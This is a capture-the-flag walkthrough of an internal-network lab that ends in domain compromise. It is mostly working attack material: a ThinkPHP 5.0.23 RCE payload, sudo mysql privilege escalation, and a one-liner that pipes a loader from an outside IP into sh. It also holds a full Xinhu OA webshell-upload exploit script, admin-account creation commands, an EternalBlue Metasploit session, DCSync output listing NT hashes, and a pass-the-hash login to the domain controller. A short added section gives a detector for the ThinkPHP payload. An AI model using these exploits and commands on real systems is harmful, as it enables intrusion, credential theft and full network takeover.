Initial is an easy-rated lab environment; completing it gives players a first look at the basic workflow of internal-network penetration. The range has a single flag, with its parts spread across different machines.
The target opens on an Ubuntu server login page. fscan results:
PS C:\Wolf\Tools\fscan> .\fscan.exe -h 39.98.120.227
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.98.120.227:22 open
39.98.120.227:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.120.227 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.98.120.227 poc-yaml-thinkphp5023-method-rce poc1
Done 2/2
[*] Scan finished, elapsed: 29.9738805s
fscan reports the ThinkPHP 5.0.23 RCE (the method-override bug in the 5.0.x Request class: `_method=__construct` re-runs the constructor with attacker-supplied properties, and a `filter[]` naming a PHP callable is then applied to request input). Go straight to the ThinkPHP exploitation tool:
[+] ThinkPHP 5.0.23 RCE present
Payload: http://39.98.120.227//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
[+] http://39.98.120.227//shell.php Pass:shell
Connect with Godzilla (哥斯拉). The shell it dropped is a PHP one; pick the PHP_EVAL_XOR_BASE64 encryptor.
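What a defender should be matching on after seeing the payload above is the request body, not just the URL. The following is an added Python example written for this page, not code from the original writeup or from fscan: it scores HTTP requests for the ThinkPHP 5.0.x method-override pattern (`_method=__construct` plus a `filter[]` naming a PHP callable). The sample requests are constructed for the example; the first reproduces the scanner's payload, the third is a hypothetical variant that runs `id` instead of `phpinfo`. The list of dangerous callables is my own and not exhaustive.

```python
from urllib.parse import parse_qs, urlparse

# PHP callables that turn a ThinkPHP 5.0.x filter[] override into code
# execution. Constructed for this example; extend it for your environment.
DANGEROUS_CALLABLES = {
    "phpinfo", "system", "exec", "shell_exec", "passthru", "assert",
    "call_user_func", "call_user_func_array", "proc_open", "popen",
}


def check_request(method, url, body=""):
    """Score one HTTP request for the ThinkPHP 5.0.23 method-override RCE.

    Returns {"malicious": bool, "indicators": [...]}. The decisive pair is
    _method=__construct in a POST body (ThinkPHP reads the override from
    $_POST) plus a filter[] value naming a callable; server[...] and the
    s=captcha route are supporting context only.
    """
    query = parse_qs(urlparse(url).query, keep_blank_values=True)
    params = parse_qs(body, keep_blank_values=True) if body else {}
    indicators = []

    override = (method.upper() == "POST"
                and params.get("_method", [""])[0] == "__construct")
    if override:
        indicators.append("_method=__construct")

    # parse_qs keeps the brackets in the key, so both spellings are checked.
    callables = {v.lower() for k, vs in params.items()
                 if k in ("filter[]", "filter") for v in vs}
    bad = sorted(callables & DANGEROUS_CALLABLES)
    if bad:
        indicators.append("filter callable: " + ",".join(bad))

    if any(k.startswith("server[") for k in params):
        indicators.append("server[] property override")
    if query.get("s", [""])[0] == "captcha":
        indicators.append("s=captcha route")

    return {"malicious": override and bool(bad), "indicators": indicators}


# Constructed sample traffic: the payload the scanner used above, a benign
# login POST, and a hypothetical variant that runs a command via system().
SAMPLE_REQUESTS = [
    ("POST", "http://39.98.120.227//?s=captcha&test=-1",
     "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"),
    ("POST", "http://39.98.120.227/index.php?s=index/login",
     "username=alice&password=hunter2&remember=1"),
    ("POST", "http://39.98.120.227/?s=captcha",
     "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
]


def triage(requests_):
    """Return the indices of the requests that match the RCE pattern."""
    return [i for i, (m, u, b) in enumerate(requests_)
            if check_request(m, u, b)["malicious"]]


if __name__ == "__main__":
    for m, u, b in SAMPLE_REQUESTS:
        print(m, u, check_request(m, u, b))
```

Run over real traffic this needs request bodies, so it belongs in a WAF or reverse-proxy log rather than the access log, which only shows the `?s=captcha` part of the payload.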
Check who we are:
/var/www/html/ > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Unprivileged www-data, so look for a privilege escalation path.
find / -user root -perm -4000 -print 2> result.txt
`-perm -4000` matches files with the setuid bit; `2> result.txt` redirects stderr (the permission-denied noise from directories www-data cannot read) into result.txt so only hits reach the screen.
/var/www/html/ > find / -user root -perm -4000 -print 2> result.txt
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/stapbpf
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
A file with the SUID bit set runs with the privileges of its owner, here root, which is what makes SUID binaries candidates for privilege escalation. Everything in this list is a stock distribution binary, though, and none of them is an obvious win on its own, so the quicker check is what sudo allows:
sudo -l
This lists the commands the current user may run through sudo.
/var/www/html/ > sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
The key line is the last one: NOPASSWD means www-data can run /usr/bin/mysql as root via sudo without being asked for a password.
Check GTFOBins (I'm setting up a local mirror) for how to escalate through the mysql binary.
/var/www/html/ > sudo mysql -e '\! id'
uid=0(root) gid=0(root) groups=0(root)
Privilege escalation succeeded: the mysql client's `\!` (system) command hands the rest of the line to a shell, and since the client itself runs as root under sudo, so does that shell. The four or five writeups I've read all escalate this way; I'll look into other methods later, though there probably aren't any.
Now find the flag:
/var/www/html/ > sudo mysql -e '\! find / -name "*flag*" 2>/dev/null'
(Quote the glob so the shell does not expand it against the web root first.)
/var/www/html/ > sudo mysql -e '\! cat /root/flag/flag01.txt'
flag01:
flag01: flag{60b53231-
Now throw a reverse shell to bring the host into vshell; since it is Ubuntu, use the Linux loader one-liner:
(curl -fsSL -m180 http://182.92.244.103:8084/slt||wget -T180 -q http://182.92.244.103:8084/slt)|sh
At first I had forgotten to open the port in the security group and couldn't get a connection; once I did it came through. I nearly cried.
root@ubuntu-web01:/# id
uid=0(root) gid=0(root) groups=0(root)
Once on the box, look at its addressing. For a pure CTF the next step after a flag is to keep pushing deeper for the next one, and the hint shown with the first flag says the remaining parts are on the internal network. In a real engagement you would first pick the current server clean for credentials and data worth having; here it is only a challenge, so straight into the intranet.
Check the IP, then upload fscan (any scanner that can probe the subnet will do).
root@ubuntu-web01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.1.15 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe09:947e prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:09:94:7e txqueuelen 1000 (Ethernet)
RX packets 541274 bytes 215199342 (215.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 419305 bytes 40971021 (40.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1816 bytes 171905 (171.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1816 bytes 171905 (171.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
So the edge host's internal address is 172.22.1.15 on a /16.
Upload fscan and make it executable:
root@ubuntu-web01:/usr/bin# cd /tmp
root@ubuntu-web01:/tmp# ls
bash fscan
root@ubuntu-web01:/tmp# chmod +x fscan
root@ubuntu-web01:/tmp# ./fscan -h 172.22.1.15/16
fscan finds three more hosts:
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None redirect url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
172.22.1.21 (Windows Server 2008 R2) is flagged for MS17-010 (EternalBlue).
172.22.1.2 is the domain controller, DC01.xiaorang.lab.
172.22.1.18 runs Xinhu OA (信呼协同办公系统); look it up for a known CVE.
Set up a tunnel: open a SOCKS port in vshell, allow it in the server's inbound security-group rules, then point Proxifier at that proxy server and add a proxification rule for the internal range.
Start with the OA. With the version known, just search for the n-day. Not much readable turned up; the CSDN posts always want a membership.
Script:
import requests

# Xinhu OA chain: log in with the default account (admin / admin123, sent
# base64-encoded by the login form), upload a file to the public area (the
# server stores it with a .uptemp suffix), then hit task.php's
# qcloudCos|runt task, which renames the temp file back to .php.
SHELL_FILE = 'shell.php'   # one-liner webshell in the current directory

session = requests.session()
url_pre = 'http://172.22.1.18'
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',    # base64('admin') + '::'
    'adminpass': 'YWRtaW4xMjM=',  # base64('admin123')
    'yanzm': ''
}
r = session.post(url1, data=data1)
with open(SHELL_FILE, 'rb') as f:          # binary mode so the bytes go up unchanged
    r = session.post(url2, files={'file': f})
upload = r.json()
filepath = '/' + str(upload['filepath']).split('.uptemp')[0] + '.php'
fileid = upload['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={fileid}'
r = session.get(url3)                      # triggers the .uptemp -> .php rename
print('shell path:', url_pre + filepath)
r = session.get(url_pre + filepath + "?1=system('whoami');")
print(r.text)
Put a one-liner PHP webshell named shell.php (the file the script opens) in the current directory. When the script runs it prints the shell's path on the server; connect to it with Godzilla.
C:/phpStudy/PHPTutorial/WWW/upload/2026-04/ > whoami
nt authority\system
Windows commands differ from Linux ones; the shell here is cmd.
The flag is usually under the Administrator directory; I don't know why it's designed that way.
C:\Users\Administrator\flag > type flag02.txt
___ ___ ___ ________ ________ ________ ________ ________ ________
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
From here one could also add a new local administrator and RDP in for a GUI. This is noisy: creating the account and changing the Administrators group leave 4720 and 4732 events in the Security log, so on a real engagement avoid it unless you need it.
# add a user
net user vch qwer1234! /add
# add the user to the local Administrators group
net localgroup administrators vch /add
# list the local Administrators group
net localgroup administrators
# enumerate Domain Admins
net group "domain admins" /domain
The flag hint says to attack the DC. First get a shell on 172.22.1.21 with EternalBlue. Because the traffic goes out through the SOCKS tunnel, the attacker cannot receive the default reverse_tcp callback, so the payload is switched to a bind_tcp one that msf connects to through the proxy:
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp_uuid
payload => windows/x64/meterpreter/bind_tcp_uuid
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.1.21
RHOSTS => 172.22.1.21
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 172.22.1.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.22.1.21:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 172.22.1.21:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.22.1.21:445 - The target is vulnerable.
[*] 172.22.1.21:445 - Connecting to target for exploitation.
[+] 172.22.1.21:445 - Connection established for exploitation.
[+] 172.22.1.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.1.21:445 - CORE raw buffer dump (53 bytes)
[*] 172.22.1.21:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 172.22.1.21:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 172.22.1.21:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 172.22.1.21:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 172.22.1.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.1.21:445 - Trying exploit with 12 Groom Allocations.
[*] 172.22.1.21:445 - Sending all but last fragment of exploit packet
[*] 172.22.1.21:445 - Starting non-paged pool grooming
[+] 172.22.1.21:445 - Sending SMBv2 buffers
[+] 172.22.1.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.1.21:445 - Sending final SMBv2 buffers.
[*] 172.22.1.21:445 - Sending last fragment of exploit packet!
[*] 172.22.1.21:445 - Receiving response from exploit packet
[+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.1.21:445 - Sending egg to corrupted connection.
[*] 172.22.1.21:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.22.1.21:4444
[*] Sending stage (244806 bytes) to 172.22.1.21
[*] Meterpreter session 1 opened (127.0.0.1:7646 -> 172.22.1.21:4444) at 2026-04-22 19:19:37 +0800
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
From here shell commands work (`shell` drops into cmd).
Next load kiwi and DCSync the domain. DCSync only succeeds for principals holding the replication extended rights on the domain object; this session runs as SYSTEM and therefore authenticates to the DC as the computer account XIAORANG-WIN7$, which evidently holds them in this lab, a misconfiguration that would be a finding on its own. It also leaves a 4662 replication event on the DC that defenders watch for.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ c7bc127e8dc6d7520f6e5d26c19387ba 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ eeb40575dc8ff47b57189c37e53f8eb0 4096
1108 XIAORANG-WIN7$ 11b6f19640d90addd1f593bd01e22379 4096
mimikatz(powershell) # exit
Bye!
The CSV columns are RID, account name, NT hash and userAccountControl (512 is an enabled normal account, 514 is normal plus disabled, 4096 a workstation trust account, 532480 a server trust account that is trusted for delegation, i.e. the DC itself). The NT hash is all pass-the-hash needs. Use impacket's wmiexec (the build pwn爷 gave me) straight away, passing the Administrator hash as LM:NT with the LM half left empty:
PS C:\Users\21899> impacket-wmiexec.exe -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gb2312
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 4659-5697
Directory of C:\
2022/05/12 17:17 <DIR> PerfLogs
2022/06/05 19:46 <DIR> Program Files
2022/05/18 10:00 <DIR> Program Files (x86)
2026/04/22 19:48 <DIR> Windows
0 File(s) 0 bytes
C:\>
Same directory as before:
C:\Users\Administrator\flag>type flag03.txt
___ ___
\\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
\ / / / //__| | // / / //___/ / //__| | //| / / //
/ / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
/ /\\ / / // | | // / / // | | // | | // | / / // / /
/ / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
flag03: e8f88d0d43d6}
Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.